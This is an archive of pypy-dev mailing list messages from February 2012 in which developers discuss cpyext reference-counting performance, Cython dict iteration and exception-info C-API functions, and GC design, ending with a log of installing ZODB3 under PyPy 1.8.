JIT if this doesn't work out). In practice, I think that either side is
right for the right kind of problem. And, no, I really don't care who is
"more" right.

> This said, I've added all the functions you mentioned in a previous email.

Very cool, thanks!! I already implemented it for Cython but hadn't pushed
it yet. Just in case: did you see my patch in the CPython tracker? I made
PyErr_GetExcInfo() return new references and PyErr_SetExcInfo() steal the
references - that behaviour fits best with all important use cases.
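[Editorial aside: the dict-iteration semantics behind this exchange, which any iterator-based replacement for PyDict_Next() must still deliver, can be checked from plain Python. CPython behaviour shown; a small illustration, not code from the thread:]

```python
# Growing a dict while iterating over it must abort the iteration.
d = {1: 2, 10: 20}
err_msg = None
try:
    for key in d:
        d[key + 1] = 5   # adds a new key, so the dict size changes
except RuntimeError as exc:
    err_msg = str(exc)

# CPython raises RuntimeError("dictionary changed size during iteration")
assert err_msg is not None and "changed size" in err_msg
```

The crash report later in this digest is about exactly this error failing to appear when the same pattern runs through cpyext.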
> You may try your tests again with the nightly build.

I will.

Stefan

From gbowyer at fastmail.co.uk Fri Feb 24 22:23:30 2012
From: gbowyer at fastmail.co.uk (Greg Bowyer)
Date: Fri, 24 Feb 2012 13:23:30 -0800
Subject: [pypy-dev] Biting off more than I can chew
In-Reply-To: 
References: <4F42DB6C.7010307@fastmail.co.uk>
Message-ID: <4F47FFD2.8020600@fastmail.co.uk>

That's pretty awesome.

So if anyone else is willing to join in a challenge, I have an example
first steps piece of C that uses the azul interfaces to attempt to grab a
blob of memory.

https://bitbucket.org/GregBowyer/pypy-c4gc/raw/1889f31b43e5/azm_mem_test/test.c

I was expecting my code not to work at the printf; however, it does not
actually seem to do the mreserve.

Anyone want to join my insanity?

-- Greg

On 20/02/12 16:24, Amaury Forgeot d'Arc wrote:
> 2012/2/21 Greg Bowyer
>
> > My question (probably one of many to irritate and annoy all the
> > fine folks here) would be, is there a sensible way to compile into
> > pypy a small amount of C code that can be used to bootstrap and
> > bridge some esoteric c libraries into pypy, the code that I want
> > to run, on startup of pypy would be the following
> > https://bitbucket.org/GregBowyer/pypy-c4gc/changeset/0de575b3a8d1#chg-azm_mem_test/test.c
>
> It's not annoying at all, we use it in strategic places.
> For example, see how pypy/rlib/_rffi_stacklet.py implements a
> stacklet C library that can be used in RPython.
>
> It uses an "ExternalCompilationInfo" (eci) object:
> - separate_module_files lists the .c files you want to compile and link
> - separate_module_sources is an easy way to embed C snippets (each
> source will create a .c file)
>
> Then you can use rffi.llexternal with "compilation_info=eci"
> to declare a function defined in this library.
>
> -- 
> Amaury Forgeot d'Arc
-------------- next part --------------
An HTML attachment was scrubbed...
URL: 

From stefan_ml at behnel.de Sat Feb 25 10:14:08 2012
From: stefan_ml at behnel.de (Stefan Behnel)
Date: Sat, 25 Feb 2012 10:14:08 +0100
Subject: [pypy-dev] Cython and cpyext performance
In-Reply-To: 
References: 
Message-ID: 

Stefan Behnel, 24.02.2012 11:32:
> Amaury Forgeot d'Arc, 24.02.2012 10:27:
>> I was about to write the list of operations that cpyext performs for
>> PyTuple_GET_ITEM, but this macro is too large to fit in the margin :-)
>
> Interesting. Is there a better way of doing this? CPython doesn't seem to
> provide a way to ask for owned references, even though Cython will quite
> often (but not always) call Py_INCREF() on the result anyway. Would the
> tuple parsing functions help, for example? There may well be cases where we
> could use those. Wouldn't be the first time I rewrite the function argument
> handling code, for example. ;-)

What do you think of this proposal?

http://bugs.python.org/issue14121

Stefan

From stefan_ml at behnel.de Sat Feb 25 18:10:10 2012
From: stefan_ml at behnel.de (Stefan Behnel)
Date: Sat, 25 Feb 2012 18:10:10 +0100
Subject: [pypy-dev] crash in cpyext dict iteration
Message-ID: 

Hi,

I've rewritten Cython's dict iteration code to use normal PyIter_Next()
iteration on PyPy, but now I get a crash in one of the tests. Apparently,
the iterator fails to raise an exception when the dict is being resized
during iteration. The test goes like this:

'''
def iterdict_change_size(dict d):
    """
    >>> count, i = 0, -1
    >>> d = {1:2, 10:20}
    >>> for i in d:
    ...     d[i+1] = 5
    ...     count += 1
    ...     if count > 5:
    ...         break  # safety
    Traceback (most recent call last):
    RuntimeError: dictionary changed size during iteration
    >>> iterdict_change_size({1:2, 10:20})
    Traceback (most recent call last):
    RuntimeError: dictionary changed size during iteration
    >>> print( iterdict_change_size({}) )
    DONE
    """
    cdef int count = 0
    i = -1
    for i in d:
        d[i+1] = 5
        count += 1
        if count > 5:
            break  # safety
    return "DONE"
'''

It's supposed to raise an exception when starting the second iteration,
but in PyPy, it crashes at that point instead.

Stefan

From arigo at tunes.org Sat Feb 25 18:36:43 2012
From: arigo at tunes.org (Armin Rigo)
Date: Sat, 25 Feb 2012 18:36:43 +0100
Subject: [pypy-dev] Biting off more than I can chew
In-Reply-To: <4F47FFD2.8020600@fastmail.co.uk>
References: <4F42DB6C.7010307@fastmail.co.uk> <4F47FFD2.8020600@fastmail.co.uk>
Message-ID: 

Hi Greg,

On Fri, Feb 24, 2012 at 22:23, Greg Bowyer wrote:
> So if anyone else is willing to join in a challenge, I have an example
> first steps piece of C that uses the azul interfaces to attempt to grab a
> blob of memory.

Unsure how well using C code for the GC would work. Also, if you're
thinking about STM specifically, note that it needs to be integrated with a
special GC --- or at least, not strictly *needs* to, but if it is, we can
design a much more efficient overall way to have STM. (This is documented
in https://bitbucket.org/pypy/extradoc/raw/extradoc/planning/stm.txt ,
together with a plan for a simple STM-specific GC, which is partially
implemented.)

A bientôt,

Armin.

From arigo at tunes.org Sat Feb 25 18:42:21 2012
From: arigo at tunes.org (Armin Rigo)
Date: Sat, 25 Feb 2012 18:42:21 +0100
Subject: [pypy-dev] Biting off more than I can chew
In-Reply-To: 
References: <4F42DB6C.7010307@fastmail.co.uk> <4F47FFD2.8020600@fastmail.co.uk>
Message-ID: 

Re-hi,

Ah, another matter. I don't know how interesting the goal of a no-pause GC
is together with STM.
It would seem to me that STM is, by itself, not really well-suited if you
want to absolutely avoid pauses: if a transaction is aborted a few times
before eventually succeeding to commit, then you have an unexpected pause
between the time when the transaction was first started and the time when
it committed. I think it's a built-in property of all transactional memory
systems to not be really "real-time safe". Maybe they can be made real-time
safe by falling back to nontransactional single-threaded execution at some
point, but that looks more advanced than I care for right now.

A bientôt,

Armin.

From stefan_ml at behnel.de Sun Feb 26 09:50:11 2012
From: stefan_ml at behnel.de (Stefan Behnel)
Date: Sun, 26 Feb 2012 09:50:11 +0100
Subject: [pypy-dev] Py_DecRef() in cpyext
Message-ID: 

Hi,

having rewritten Cython's dict iteration to use normal iteration, I ran a
little benchmark for comparison and it turned out to be (algorithmically)
faster by more than an order of magnitude for a dict with 1000 items.
That's pretty decent, although it's still about 100x slower than in
CPython. I'm certain that there's much more of this low-hanging fruit to
find all over the place.

Next, I ran callgrind over my little benchmark and it showed that the
dominating part of the running time had shifted from 99% in PyDict_Next()
to 56% in Py_DecRef(). Sadly, there wasn't much more to be read out of it,
because the graph was just full of hex numbers instead of names. To be
attributed to the JIT compiled code, I guess.

Looking at Py_DecRef(), however, left me somewhat baffled. I would have
expected this to be the most intensively tuned function in all of cpyext,
but it even started with this comment:

"""
# XXX Optimize these functions and put them into macro definitions
"""

Ok, sounds reasonable. Should have been done already, though. Especially
when I took a look at object.h and saw that the Py_DECREF() macro *always*
calls into it. Another surprise.
I had understood in previous discussions that the refcount emulation in
cpyext only counts C references, which I consider a suitable design. (I
guess something as common as Py_None uses the obvious optimisation of
always having a ref-count > 1, right? At least when not debugging...)

So I changed the macros to use an appropriate C-level implementation:

"""
#define Py_INCREF(ob)   ((((PyObject *)ob)->ob_refcnt > 0) ? \
        ((PyObject *)ob)->ob_refcnt++ : (Py_IncRef((PyObject *)ob)))

#define Py_DECREF(ob)   ((((PyObject *)ob)->ob_refcnt > 1) ? \
        ((PyObject *)ob)->ob_refcnt-- : (Py_DecRef((PyObject *)ob)))

#define Py_XINCREF(op)  do { if ((op) == NULL) ; else Py_INCREF(op); \
        } while (0)

#define Py_XDECREF(op)  do { if ((op) == NULL) ; else Py_DECREF(op); \
        } while (0)
"""

to tell the C compiler that it doesn't actually need to call into PyPy in
most cases (note that I didn't use any branch prediction macros, but that
shouldn't change all that much anyway). This shaved off a couple of cycles
from my iteration benchmark, but much less than I would have liked. My
intuition tells me that this is because almost all objects that appear in
the benchmark are actually short-lived in C space, so that pretty much
every Py_DECREF() on them kills them straight away and thus calls into
Py_DecRef() anyway. To be verified with a better test.

I think this could be fixed in some way by figuring out if there is at
least one live reference to it inside of PyPy (which is usually the case
for container iteration and parameters, for example), and as long as
that's the case, add one to the refcount to keep C code from needing to
call back into PyPy unnecessarily. A finaliser could do that, I guess.

Ok, next, I looked at the Py_DecRef() implementation itself and found it
to be rather long. Since I wasn't sure what the JIT would make of it,
please don't shout at me if any of the following comments ("^^") make no
sense.
    @cpython_api([PyObject], lltype.Void)
    def Py_DecRef(space, obj):
        if not obj:
            return

^^ this would best be handled right in C space to avoid unnecessary call
overhead and to allow the C compiler to drop this test when possible.

        assert lltype.typeOf(obj) == PyObject
        obj.c_ob_refcnt -= 1
        if DEBUG_REFCOUNT:
            debug_refcount("DECREF", obj, obj.c_ob_refcnt,
                           frame_stackdepth=3)

^^ ok, I assume debug code will automatically be removed completely

        if obj.c_ob_refcnt == 0:
            state = space.fromcache(RefcountState)
            ptr = rffi.cast(ADDR, obj)
            if ptr not in state.py_objects_r2w:
                # this is a half-allocated object, lets call the deallocator
                # without modifying the r2w/w2r dicts
                _Py_Dealloc(space, obj)

^^ this looks like an emergency special case to me - shouldn't be on the
fast path...

            else:
                w_obj = state.py_objects_r2w[ptr]

^^ here, I wonder if the JIT is smart enough to detect the double weakref
dict lookup in the (I guess) 99% code path and folds it into one?
^^ I actually wonder why this needs to use a weakref dict instead of a
normal dict. It's ref-counted after all, so we *know* there's a live
reference to it until further notice. Are weakref dicts as fast as normal
dicts in PyPy?

                del state.py_objects_r2w[ptr]
                w_type = space.type(w_obj)
                if not w_type.is_cpytype():
                    _Py_Dealloc(space, obj)
                del state.py_objects_w2r[w_obj]
                # if the object was a container for borrowed references
                state.delete_borrower(w_obj)

^^ in some place here, I would have expected the use of a freelist for the
C space object representations in order to avoid unnecessary allocations,
especially for things like short tuples etc. Is this hidden somewhere else?
Or does PyPy's runtime handle this kind of caching internally somewhere?

        else:
            if not we_are_translated() and obj.c_ob_refcnt < 0:
                message = "Negative refcount for obj %s with type %s" % (
                    obj, rffi.charp2str(obj.c_ob_type.c_tp_name))
                print >>sys.stderr, message
                assert False, message

^^ This will also vanish automatically, right?
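[Editorial aside: the freelist idea raised in the walkthrough above, reusing dead wrapper structures instead of reallocating them, can be sketched generically in plain Python. The names here are illustrative only, not taken from cpyext:]

```python
class FreeList:
    """Keep up to `limit` dead objects around for reuse, so common
    allocate/free churn can bypass the real allocator."""

    def __init__(self, factory, limit=80):
        self._factory = factory
        self._limit = limit
        self._free = []

    def acquire(self):
        # Reuse a cached object when possible, else allocate fresh.
        if self._free:
            return self._free.pop()
        return self._factory()

    def release(self, obj):
        # Cache the dead object unless the freelist is already full;
        # beyond the limit it is simply left for normal collection.
        if len(self._free) < self._limit:
            self._free.append(obj)

pool = FreeList(dict)
a = pool.acquire()
pool.release(a)
assert pool.acquire() is a  # the dead object was recycled, not reallocated
```

CPython applies the same idea at the C level to short tuples, floats, and frames; whether cpyext should do likewise for its PyObject shadows is exactly the open question in the email above.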
So, from a quick and shallow look, it seems to me that this code could be improved. By taking work off the fast paths and avoiding create-delete cycles, something as ubiquitous as this function could help in making C-API code run a lot faster. Stefan From stefan_ml at behnel.de Sun Feb 26 11:00:01 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Sun, 26 Feb 2012 11:00:01 +0100 Subject: [pypy-dev] Py_DecRef() in cpyext In-Reply-To: References: Message-ID: Stefan Behnel, 26.02.2012 09:50: > when I took a look at object.h and saw that the Py_DECREF() macro *always* > calls into it. Another surprise. > > I had understood in previous discussions that the refcount emulation in > cpyext only counts C references, which I consider a suitable design. (I > guess something as common as Py_None uses the obvious optimisation of > always having a ref-count > 1, right? At least when not debugging...) > > So I changed the macros to use an appropriate C-level implementation: > > """ > #define Py_INCREF(ob) ((((PyObject *)ob)->ob_refcnt > 0) ? \ > ((PyObject *)ob)->ob_refcnt++ : (Py_IncRef((PyObject *)ob))) > > #define Py_DECREF(ob) ((((PyObject *)ob)->ob_refcnt > 1) ? \ > ((PyObject *)ob)->ob_refcnt-- : (Py_DecRef((PyObject *)ob))) > > #define Py_XINCREF(op) do { if ((op) == NULL) ; else Py_INCREF(op); \ > } while (0) > > #define Py_XDECREF(op) do { if ((op) == NULL) ; else Py_DECREF(op); \ > } while (0) > """ > > to tell the C compiler that it doesn't actually need to call into PyPy in > most cases (note that I didn't use any branch prediction macros, but that > shouldn't change all that much anyway). This shaved off a couple of cycles > from my iteration benchmark, but much less than I would have liked. My > intuition tells me that this is because almost all objects that appear in > the benchmark are actually short-lived in C space so that pretty much every > Py_DECREF() on them kills them straight away and thus calls into > Py_DecRef() anyway. 
To be verified with a better test.

Ok, here's a stupid micro-benchmark for ref-counting:

    def bench(x):
        cdef int i
        for i in xrange(10000):
            a = x
            b = x
            c = x
            d = x
            e = x
            f = x
            g = x

Leads to the obvious C code. :) (and yes, this will eventually stop
actually being a benchmark in Cython...)

When always calling into Py_IncRef() and Py_DecRef(), I get this:

    $ pypy -m timeit -s 'from refcountbench import bench' 'bench(10)'
    1000 loops, best of 3: 683 usec per loop

With the macros above, I get this:

    $ pypy -m timeit -s 'from refcountbench import bench' 'bench(10)'
    1000 loops, best of 3: 385 usec per loop

So that's better by almost a factor of 2, just because the C compiler can
handle most of the ref-counting internally once there is more than one C
reference to an object. It will obviously be a lot less than that for
real-world code, but I think it makes it clear enough that it's worth
putting some effort into ways to avoid calling back and forth across the
border for no good reason.

Stefan

From arigo at tunes.org Sun Feb 26 11:09:36 2012
From: arigo at tunes.org (Armin Rigo)
Date: Sun, 26 Feb 2012 11:09:36 +0100
Subject: [pypy-dev] Py_DecRef() in cpyext
In-Reply-To: 
References: 
Message-ID: 

Hi Stefan,

On Sun, Feb 26, 2012 at 09:50, Stefan Behnel wrote:
> Looking at Py_DecRef(), however, left me somewhat baffled. I would have
> expected this to be the most intensively tuned function in all of cpyext,
> but it even started with this comment: (...)

Indeed, it's an obvious starting place if we want to optimize cpyext
(which did not occur at all so far). You are welcome to try.

Note that the JIT has nothing to do here: we cannot JIT any code written
in C, and it makes no sense to apply the JIT on a short RPython callback
alone. But because most of the code in module/cpyext/ is RPython code, it
means it gets turned into equivalent C code statically, with (as you
noticed) the debugging checks constant-folded away.
The first thing to try would be to rethink how the PyPy object and the
PyObject are linked together. Right now it's done with two (possibly
weak) dictionaries, one for each direction. We can at least improve the
situation by having a normal field in the PyObject pointing back to the
PyPy object. This needs to be done carefully but can be done. The issue
is that the GC needs to know about this field. It would probably require
something like: allocate some GcArrays of PyObject structures (not
pointers, directly PyObjects --- which have all the same size here, so
it works). Use something like 100 PyObject structures per GcArray, and
collect all the GcArrays in a global list. Use a freelist for dead
entries. If you allocate each GcArray as "non-movable", then you can
take pointers to the PyObjects and pass them to C code. As they are
inside the regular GcArrays, they are GC-tracked and can contain a field
that points back to the PyPy object.

A bientôt,

Armin.


From stefan_ml at behnel.de  Sun Feb 26 12:31:26 2012
From: stefan_ml at behnel.de (Stefan Behnel)
Date: Sun, 26 Feb 2012 12:31:26 +0100
Subject: [pypy-dev] Py_DecRef() in cpyext
In-Reply-To: 
References: 
Message-ID: 

Hi Armin,

Armin Rigo, 26.02.2012 11:09:
> On Sun, Feb 26, 2012 at 09:50, Stefan Behnel wrote:
>> Looking at Py_DecRef(), however, left me somewhat baffled. I would have
>> expected this to be the most intensively tuned function in all of cpyext,
>> but it even started with this comment: (...)
>
> Indeed, it's an obvious starting place if we want to optimize cpyext
> (which did not occur at all so far). You are welcome to try.

Looks like it's worth it.

> Note
> that the JIT has nothing to do here: we cannot JIT any code written in
> C

... obviously - and there's C compilers for that anyway.

> and it makes no sense to apply the JIT on a short RPython callback
> alone.

I can't see why that would be so.
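Armin's proposal above - GcArrays of (say) 100 PyObject structures each,
collected in a global list, with a freelist for dead entries - can be
sketched as a toy model in plain Python. Everything here is invented for
illustration (PAGE_SIZE, allocate(), release() are not real APIs); the real
version would be RPython code cooperating with the GC and handing out
non-movable pointers:

```python
PAGE_SIZE = 100  # PyObject structures per arena ("GcArray")

class PyObjSlot:
    """Stands in for one PyObject structure with a stable address."""
    def __init__(self):
        self.ob_refcnt = 0
        self.pypy_obj = None  # the proposed back-pointer to the PyPy object

arenas = []    # global list of all arenas
freelist = []  # dead slots, ready for reuse

def allocate(pypy_obj):
    """Hand out a slot; grow by a whole arena only when the freelist is empty."""
    if not freelist:
        arena = [PyObjSlot() for _ in range(PAGE_SIZE)]
        arenas.append(arena)
        freelist.extend(arena)
    slot = freelist.pop()
    slot.ob_refcnt = 1
    slot.pypy_obj = pypy_obj
    return slot

def release(slot):
    """Return a dead slot to the freelist instead of freeing it."""
    slot.ob_refcnt = 0
    slot.pypy_obj = None
    freelist.append(slot)

s1 = allocate("some pypy object")
slots = [allocate(i) for i in range(150)]  # spills into a second arena
assert len(arenas) == 2
release(s1)
s2 = allocate("reused")
assert s2 is s1  # the dead entry was recycled; its address never moved
```

Because the slots live inside arrays the GC knows about, they can be traced
(and the back-pointer kept alive) while C code holds raw pointers to them.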
Just looking at Py_DecRef(), I can see lots of places where cross-function runtime optimisations would make sense, for example. I'm sure a C compiler will have a hard time finding the right fast path in there. > But because most of the code in module/cpyext/ is RPython > code, it means it gets turned into equivalent C code statically Interesting. Given PyPy's reputation of taking tons of resources to build, I assume you apply WPA to the sources in order to map them to C? Then why wouldn't I get better traces from gdb and valgrind for the generated code? Is it just that the nightly builds lack debugging symbols? > The first thing to try would be to rethink how the PyPy object and the > PyObject are linked together. Right now it's done with two (possibly > weak) dictionaries, one for each direction. We can at least improve > the situation by having a normal field in the PyObject pointing back > to the PyPy object. This needs to be done carefully but can be done. Based on my experience with lxml, such a change is absolutely worth any hassle. > The issue is that the GC needs to know about this field. It would > probably require something like: allocate some GcArrays of PyObject > structures (not pointers, directly PyObjects --- which have all the > same size here, so it works). Use something like 100 PyObject > structures per GcArray, and collect all the GcArrays in a global list. > Use a freelist for dead entries. If you allocate each GcArray as > "non-movable", then you can take pointers to the PyObjects and pass > them to C code. As they are inside the regular GcArrays, they are > GC-tracked and can contain a field that points back to the PyPy > object. Sounds like a good idea to me. Stefan From arigo at tunes.org Sun Feb 26 13:29:50 2012 From: arigo at tunes.org (Armin Rigo) Date: Sun, 26 Feb 2012 13:29:50 +0100 Subject: [pypy-dev] Py_DecRef() in cpyext In-Reply-To: References: Message-ID: Hi, On Sun, Feb 26, 2012 at 12:31, Stefan Behnel wrote: > Interesting. 
> Given PyPy's reputation of taking tons of resources to build,
> I assume you apply WPA to the sources in order to map them to C?

Yes. Please read more about it starting for example from here:
http://doc.pypy.org/en/latest/architecture.html

> Then why
> wouldn't I get better traces from gdb and valgrind for the generated code?
> Is it just that the nightly builds lack debugging symbols?

Yes. With a proper debugging build you get at least the intermediate C
code. Not extremely readable but at least you can follow it.

A bientôt,

Armin.


From stefan_ml at behnel.de  Sun Feb 26 20:54:57 2012
From: stefan_ml at behnel.de (Stefan Behnel)
Date: Sun, 26 Feb 2012 20:54:57 +0100
Subject: [pypy-dev] Bringing Cython and PyPy closer together
In-Reply-To: 
References: 
Message-ID: 

Amaury Forgeot d'Arc, 18.02.2012 15:41:
> 2012/2/18 Stefan Behnel
>> Here's an example.
>>
>> Python code:
>>
>>     def print_excinfo():
>>         print(sys.exc_info())
>>
>> Cython code:
>>
>>     from stuff import print_excinfo
>>
>>     try:
>>         raise TypeError
>>     except TypeError:
>>         print_excinfo()
>>
>> With the code removed, Cython will not store the TypeError in
>> sys.exc_info(), so the Python code cannot see it. This may seem like an
>> unimportant use case (who uses sys.exc_info() anyway, right?), but this
>> becomes very visible when the code that uses sys.exc_info() is not user
>> code but CPython itself, e.g. when raising another exception or when
>> inspecting frames. Things grow really bad here, especially in Python 3.
>
> I think I understand now, thanks for your example.
> Things are a bit simpler in PyPy because these exceptions are
> stored in the frame that is currently handling it. At least better than
> CPython
> which stores it in one place, and has to somehow save the state of the
> previous frames.
> Did you consider adding such a function to CPython?
> "PyErr_SetCurrentFrameExceptionInfo"?
>
> For the record, pypy could implement it as:
> space.getexecutioncontext().gettopframe_nohidden().last_exception =
>     operationerr
> i.e. the thing returned by sys.exc_info().

I've dropped a patch for CPython in the corresponding tracker ticket:
http://bugs.python.org/issue14098

The (trivial) implementation of the two functions is at the end of this file:
http://bugs.python.org/file24613/exc_info_capi.patch

Could you add them to PyPy? Thanks!

Stefan


From asouzaleite at gmx.de  Mon Feb 27 10:53:26 2012
From: asouzaleite at gmx.de (Aroldo Souza-Leite)
Date: Mon, 27 Feb 2012 10:53:26 +0100
Subject: [pypy-dev] ZODB3
In-Reply-To: 
References: 
Message-ID: <4F4B5296.6050903@gmx.de>

Hi list,

just to keep you informed:

the ZODB3 can be successfully installed in a PyPy-1.8 virtual environment,
but the tests fail. Below is the whole bash session I tried on Ubuntu LTS.
For the PyPy developers the interesting part might be the last section,
"Running the ZODB3 tests".

Thanks for the great job you are doing.

Aroldo.
Installing ZODB3 in a PyPy virtualenv ===================================== Ubuntu Lucid Lynx (LTS) 2012-02-29 Verifying the virtualenv ------------------------ :: (tmp-env-pypy)aroldo at aroldo-laptop:~/tmp/python/tmp-env-pypy$ env|grep ENV VIRTUAL_ENV=/home/aroldo/tmp/python/tmp-env-pypy PIP_ENVIRONMENT=/home/aroldo/tmp/python/tmp-env-pypy (tmp-env-pypy)aroldo at aroldo-laptop:~/tmp/python/tmp-env-pypy$ python --version Python 2.7.2 (0e28b379d8b3, Feb 09 2012, 19:41:19) [PyPy 1.8.0 with GCC 4.4.3] (tmp-env-pypy)aroldo at aroldo-laptop:~/tmp/python/tmp-env-pypy$ which pip /home/aroldo/tmp/python/tmp-env-pypy/bin/pip Installing the zodb3 (using pip) --------------------------------- :: (tmp-env-pypy)aroldo at aroldo-laptop:~/tmp/python/tmp-env-pypy$ pip install zodb3 Downloading/unpacking zodb3 Downloading ZODB3-3.10.5.tar.gz (706Kb): 706Kb downloaded Running setup.py egg_info for package zodb3 Downloading/unpacking transaction>=1.1.0 (from zodb3) Downloading transaction-1.2.0.tar.gz (42Kb): 42Kb downloaded Running setup.py egg_info for package transaction Downloading/unpacking zc.lockfile (from zodb3) Downloading zc.lockfile-1.0.0.tar.gz Running setup.py egg_info for package zc.lockfile Downloading/unpacking ZConfig (from zodb3) Downloading ZConfig-2.9.2.tar.gz (261Kb): 261Kb downloaded Running setup.py egg_info for package ZConfig Downloading/unpacking zdaemon (from zodb3) Downloading zdaemon-2.0.4.tar.gz (42Kb): 42Kb downloaded Running setup.py egg_info for package zdaemon Downloading/unpacking zope.event (from zodb3) Downloading zope.event-3.5.1.tar.gz Running setup.py egg_info for package zope.event Downloading/unpacking zope.interface (from zodb3) Downloading zope.interface-3.8.0.tar.gz (111Kb): 111Kb downloaded Running setup.py egg_info for package zope.interface Requirement already satisfied (use --upgrade to upgrade): setuptools in ./site- packages/setuptools-0.6c11-py2.7.egg (from zc.lockfile->zodb3) Installing collected packages: zodb3, transaction, 
zc.lockfile, ZConfig, zdaemo n, zope.event, zope.interface Running setup.py install for zodb3 building 'BTrees._OOBTree' extension cc -fPIC -Wimplicit -Isrc -I/home/aroldo/tmp/python/tmp-env-pypy/include -c src/BTrees/_OOBTree.c -o build/temp.linux-i686-2.7/src/BTrees/_OOBTree.o cc -shared build/temp.linux-i686-2.7/src/BTrees/_OOBTree.o -o build/lib.lin ux-i686-2.7/BTrees/_OOBTree.pypy-18.so building 'BTrees._IOBTree' extension cc -fPIC -Wimplicit -DEXCLUDE_INTSET_SUPPORT -Isrc -I/home/aroldo/tmp/pytho n/tmp-env-pypy/include -c src/BTrees/_IOBTree.c -o build/temp.linux-i686-2.7/sr c/BTrees/_IOBTree.o cc -shared build/temp.linux-i686-2.7/src/BTrees/_IOBTree.o -o build/lib.lin ux-i686-2.7/BTrees/_IOBTree.pypy-18.so building 'BTrees._OIBTree' extension cc -fPIC -Wimplicit -Isrc -I/home/aroldo/tmp/python/tmp-env-pypy/include -c src/BTrees/_OIBTree.c -o build/temp.linux-i686-2.7/src/BTrees/_OIBTree.o cc -shared build/temp.linux-i686-2.7/src/BTrees/_OIBTree.o -o build/lib.lin ux-i686-2.7/BTrees/_OIBTree.pypy-18.so building 'BTrees._IIBTree' extension cc -fPIC -Wimplicit -DEXCLUDE_INTSET_SUPPORT -Isrc -I/home/aroldo/tmp/pytho n/tmp-env-pypy/include -c src/BTrees/_IIBTree.c -o build/temp.linux-i686-2.7/sr c/BTrees/_IIBTree.o cc -shared build/temp.linux-i686-2.7/src/BTrees/_IIBTree.o -o build/lib.lin ux-i686-2.7/BTrees/_IIBTree.pypy-18.so building 'BTrees._IFBTree' extension cc -fPIC -Wimplicit -DEXCLUDE_INTSET_SUPPORT -Isrc -I/home/aroldo/tmp/pytho n/tmp-env-pypy/include -c src/BTrees/_IFBTree.c -o build/temp.linux-i686-2.7/sr c/BTrees/_IFBTree.o cc -shared build/temp.linux-i686-2.7/src/BTrees/_IFBTree.o -o build/lib.lin ux-i686-2.7/BTrees/_IFBTree.pypy-18.so building 'BTrees._fsBTree' extension cc -fPIC -Wimplicit -DEXCLUDE_INTSET_SUPPORT -Isrc -I/home/aroldo/tmp/pytho n/tmp-env-pypy/include -c src/BTrees/_fsBTree.c -o build/temp.linux-i686-2.7/sr c/BTrees/_fsBTree.o cc -shared build/temp.linux-i686-2.7/src/BTrees/_fsBTree.o -o build/lib.lin 
ux-i686-2.7/BTrees/_fsBTree.pypy-18.so
building 'BTrees._LOBTree' extension
cc -fPIC -Wimplicit -DEXCLUDE_INTSET_SUPPORT -Isrc -I/home/aroldo/tmp/python/tmp-env-pypy/include -c src/BTrees/_LOBTree.c -o build/temp.linux-i686-2.7/src/BTrees/_LOBTree.o
cc -shared build/temp.linux-i686-2.7/src/BTrees/_LOBTree.o -o build/lib.linux-i686-2.7/BTrees/_LOBTree.pypy-18.so
building 'BTrees._OLBTree' extension
cc -fPIC -Wimplicit -Isrc -I/home/aroldo/tmp/python/tmp-env-pypy/include -c src/BTrees/_OLBTree.c -o build/temp.linux-i686-2.7/src/BTrees/_OLBTree.o
cc -shared build/temp.linux-i686-2.7/src/BTrees/_OLBTree.o -o build/lib.linux-i686-2.7/BTrees/_OLBTree.pypy-18.so
building 'BTrees._LLBTree' extension
cc -fPIC -Wimplicit -DEXCLUDE_INTSET_SUPPORT -Isrc -I/home/aroldo/tmp/python/tmp-env-pypy/include -c src/BTrees/_LLBTree.c -o build/temp.linux-i686-2.7/src/BTrees/_LLBTree.o
cc -shared build/temp.linux-i686-2.7/src/BTrees/_LLBTree.o -o build/lib.linux-i686-2.7/BTrees/_LLBTree.pypy-18.so
building 'BTrees._LFBTree' extension
cc -fPIC -Wimplicit -DEXCLUDE_INTSET_SUPPORT -Isrc -I/home/aroldo/tmp/python/tmp-env-pypy/include -c src/BTrees/_LFBTree.c -o build/temp.linux-i686-2.7/src/BTrees/_LFBTree.o
cc -shared build/temp.linux-i686-2.7/src/BTrees/_LFBTree.o -o build/lib.linux-i686-2.7/BTrees/_LFBTree.pypy-18.so
building 'persistent.cPersistence' extension
cc -fPIC -Wimplicit -Isrc -I/home/aroldo/tmp/python/tmp-env-pypy/include -c src/persistent/cPersistence.c -o build/temp.linux-i686-2.7/src/persistent/cPersistence.o
src/persistent/cPersistence.c: In function 'Per_set_oid':
src/persistent/cPersistence.c:998: warning: passing argument 3 of 'PyObject_Cmp' from incompatible pointer type
/home/aroldo/tmp/python/tmp-env-pypy/include/pypy_decl.h:263: note: expected 'long int *' but argument is of type 'int *'
src/persistent/cPersistence.c: In function 'Per_set_jar':
src/persistent/cPersistence.c:1034: warning: passing argument 3 of 'PyObject_Cmp' from incompatible pointer type
/home/aroldo/tmp/python/tmp-env-pypy/include/pypy_decl.h:263: note: expected 'long int *' but argument is of type 'int *'
cc -fPIC -Wimplicit -Isrc -I/home/aroldo/tmp/python/tmp-env-pypy/include -c src/persistent/ring.c -o build/temp.linux-i686-2.7/src/persistent/ring.o
cc -shared build/temp.linux-i686-2.7/src/persistent/cPersistence.o build/temp.linux-i686-2.7/src/persistent/ring.o -o build/lib.linux-i686-2.7/persistent/cPersistence.pypy-18.so
building 'persistent.cPickleCache' extension
cc -fPIC -Wimplicit -Isrc -I/home/aroldo/tmp/python/tmp-env-pypy/include -c src/persistent/cPickleCache.c -o build/temp.linux-i686-2.7/src/persistent/cPickleCache.o
src/persistent/cPickleCache.c: In function 'cc_oid_unreferenced':
src/persistent/cPickleCache.c:655: warning: implicit declaration of function '_Py_ForgetReference'
cc -fPIC -Wimplicit -Isrc -I/home/aroldo/tmp/python/tmp-env-pypy/include -c src/persistent/ring.c -o build/temp.linux-i686-2.7/src/persistent/ring.o
cc -shared build/temp.linux-i686-2.7/src/persistent/cPickleCache.o build/temp.linux-i686-2.7/src/persistent/ring.o -o build/lib.linux-i686-2.7/persistent/cPickleCache.pypy-18.so
building 'persistent.TimeStamp' extension
cc -fPIC -Wimplicit -Isrc -I/home/aroldo/tmp/python/tmp-env-pypy/include -c src/persistent/TimeStamp.c -o build/temp.linux-i686-2.7/src/persistent/TimeStamp.o
cc -shared build/temp.linux-i686-2.7/src/persistent/TimeStamp.o -o build/lib.linux-i686-2.7/persistent/TimeStamp.pypy-18.so
Installing fsdump script to /home/aroldo/tmp/python/tmp-env-pypy/bin
Installing fstail script to /home/aroldo/tmp/python/tmp-env-pypy/bin
Installing zeopack script to /home/aroldo/tmp/python/tmp-env-pypy/bin
